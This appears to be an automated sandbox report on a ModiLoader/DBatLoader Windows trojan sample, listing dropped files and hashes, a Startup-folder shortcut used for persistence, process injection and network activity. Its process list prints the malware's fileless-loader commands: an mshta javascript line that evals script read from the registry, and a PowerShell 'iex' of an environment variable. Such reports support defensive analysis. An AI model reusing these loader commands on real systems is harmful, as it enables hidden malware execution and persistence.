MD5 f2ae417dcfcbe11a00d1102e6b587247
SHA1 0078bd4798af0b8a717425f1a85a1ff2a70c4c37
SHA256 0dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b
SHA512 8fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea

C:\Users\Admin\AppData\Local\d3afae00\52d5d4d8.73caeeca8

MD5 d24de2ff731484fcc229a761a5fb4b70
SHA1 c25b15fe2439335aa3baa69b5893376e6a1fb691
SHA256 275472beafe684843b88cc2cb351c0afc0ae7a04c64847d9491f6b5d8b9efe94
SHA512 14a7a3da810ff40d9e9922436b034310188d6a85e4452fb77aa8aba86f78ef071db2acabd9e92a9cee2f90f3d09be70b343eabbfdf4c30683a9b32309bdb15c4

C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk

MD5 9be36745b428498d72c05ed897c08da0
SHA1 e7659827d1b27b19fdee4d3e9a8a4293c801aaf5
SHA256 02516a051e824a721ebb2303cf02564ecef6fbd26dd762998c2e628e98137ed3
SHA512 923dc3860ca5156ccd4c94f35c926ce81bc6af84ccba3d03d2f66aea1bf08742bba0cdae547c28c439015d8e94798c6da0a27c7268e1e343faa1b2f0387e4c4e

C:\Users\Admin\AppData\Roaming\e00a3efa\fe73a489.73caeeca8

MD5 439b95e14ce359094802dac9301c7947
SHA1 10eb835108cdcd38a05403182e9170ff03860dcb
SHA256 352b376c17ee9eef3095a68327cf67a9ac1cafe5b60b9b5af8cf0338e9db5532
SHA512 a6b25732bed86a02cbd4142aea38bb55cc04899dab4e2b58eea8733d3d5ec1c1846b572fd2edb2ce70d86c8a7d4357c20272788f1c666baaa469525dbb02abd5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

MD5 8b9eb07f7a6f1e9e7dadb5f9a6efdb62
SHA1 f569e9dacef088dd9bf13fc7bf87df5a329db24f
SHA256 ff566b2912d5cb91cf6776275f8f1cde0711e89f308d0ae1428de30380d93535
SHA512 646948890d5420d383c01f3adda7b5bed665d2af7f42726b4373717a0df7e431eeeff051df8b149b64f047c8e7d57e18cc49fe92f65a613ca9bd2d54fd9d4ac5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar6B77.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 13e336a117fe4753e866a2f18f749497
SHA1 7950c73f02b649f205b87c46701dffe524b52d67
SHA256 06bef280ccafa4e9b71a15a5fc259bb542783891dc14873d238db51a83a8cde2
SHA512 970caec05a7e41904ddf7060907abaab53a0fea13052c00f36dd3cf81e9f0c410c8de255f74c029d448ac68963f8b47aa8c7e66e3c7641f44b437159d11d1784

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 23:45

Reported

2024-05-22 23:47

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 1336 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 5604 wrote to memory of 5108 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5108 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5108 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:l7D0UM="CypB";Jh6=new%20ActiveXObject("WScript.Shell");V9nua5cGx="3db";eHRP44=Jh6.RegRead("HKLM\\software\\Wow6432Node\\ABMU8Rs\\dcbepLrGC");PXO05ZrP="dUN2dRI";eval(eHRP44);wNqwZlC1="QXGX3UrU";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:piiajf

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp

Files

memory/1852-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1852-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1852-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1852-6-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-10-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-9-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-8-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-7-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-11-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/1852-12-0x00000000009C0000-0x0000000000A96000-memory.dmp

memory/5108-14-0x00000000048F0000-0x0000000004926000-memory.dmp

memory/5108-15-0x00000000050C0000-0x00000000056E8000-memory.dmp

memory/5108-16-0x0000000004F00000-0x0000000004F22000-memory.dmp

memory/5108-17-0x00000000056F0000-0x0000000005756000-memory.dmp

memory/5108-18-0x0000000005760000-0x00000000057C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1tszrt3x.sdy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5108-28-0x00000000057D0000-0x0000000005B24000-memory.dmp

memory/5108-29-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

memory/5108-30-0x0000000005CF0000-0x0000000005D3C000-memory.dmp

memory/5108-31-0x00000000074F0000-0x0000000007B6A000-memory.dmp

memory/5108-32-0x0000000006D70000-0x0000000006D8A000-memory.dmp